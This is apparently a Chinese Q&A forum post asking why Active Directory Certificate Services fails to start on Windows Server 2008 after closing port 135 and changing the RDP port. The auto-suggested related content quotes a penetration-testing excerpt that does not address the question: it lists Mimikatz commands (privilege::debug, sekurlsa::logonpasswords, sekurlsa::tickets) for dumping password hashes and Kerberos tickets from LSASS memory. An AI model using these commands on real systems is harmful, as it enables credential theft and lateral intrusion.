微软证书服务Active Directory无法启动
Windows server 2008重启服务器后,关闭135端口、更改3389端口后,,重启了服务器,Active Directory证书服务无法启动,如图,有哪位朋友专家知道是什么情况?解决有酬谢!
- 这篇博客也许可以解决你的问题👉 :Active Directory 域服务的建立与测试
- 除此之外, 这篇博客: Active Directory渗透中的 获取缓存的凭证 部分也许能够解决你的问题, 你可以仔细阅读以下内容或者直接跳转源博客中阅读:
kerberos认证过程中,使用LSASS服务存储密码hash,用于TGT的更新,密码hash存储在LSASS服务对应的内存空间中。
若能够提取密码hash,则可以尝试破解。
由于LSASS服务为系统服务,故提取密码hash的前提是已经具备系统权限。
用到的工具:Mimikatz(https://github.com/gentilkiwi/mimikatz)
详细使用说明:https://github.com/gentilkiwi/mimikatz/wiki
备注:Mimikatz两种建议运行方式:1)在内存中加载;2)将LSASS内存数据导出到本地机器,再运行mimikatz。
以下为mimikatz操作命令:
mimikatz > privilege::debug # 启用SeDebugPrivlege权限。SeDebugPrivlege权限可以调试其他账号进程的内存数据。 mimikatz > sekurlsa::logonpasswords # 导出已登录用户的凭证信息。NTLM和SHA1两个参数即为密码hash。 mimikatz > sekurlsa::tickets # 导出内存中的ticket信息,包含TGT和TGS。
如果你已经解决了该问题, 非常希望你能够分享一下解决方案, 写成博客, 将相关链接放在评论区, 以帮助更多的人 ^-^